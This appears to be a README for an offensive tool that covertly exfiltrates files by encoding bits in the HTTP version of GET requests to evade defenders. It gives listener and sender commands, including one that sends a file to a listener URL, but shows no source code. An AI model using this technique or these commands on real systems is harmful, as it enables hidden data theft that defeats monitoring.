http-protocol-exfil
Use the HTTP protocol version to send a file bit by bit ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).
Create listener
To run the listener use listener.py with one optional argument: the port it will be listening in.
python3 listener.py [PORT]
Example:
python3 listener.py 8080
Send a file
To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).
python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]
Example:
python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt
Example
First the file is sent:
If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:
The new file is created with the content of the input file:
Motivation
I think (I am not sure) I read someone on Twitter who claimed to have used this to exfiltrate data and I liked the idea, if you are that person let me know.
2 Jan 6, 2022
5 Oct 5, 2022
11 Dec 8, 2022
169 Oct 5, 2022
5 Nov 16, 2022
2.3k Dec 28, 2022
43 May 11, 2022
1.2k Dec 29, 2022
7 Oct 30, 2022
15 Dec 02, 2022
1 Nov 12, 2021
35 Dec 14, 2022
2 Mar 29, 2022
3.5k Dec 31, 2022
227 Dec 27, 2022
123 Nov 09, 2022
32 Dec 26, 2022
81 Dec 22, 2022
4 Jun 02, 2021
5 Aug 21, 2022
0 Dec 12, 2021
16 Nov 22, 2022
1 Oct 24, 2021
5 Jul 25, 2022
471 Dec 27, 2022
39 Dec 22, 2022
322 Dec 28, 2022
1 Sep 13, 2022
269 Dec 20, 2022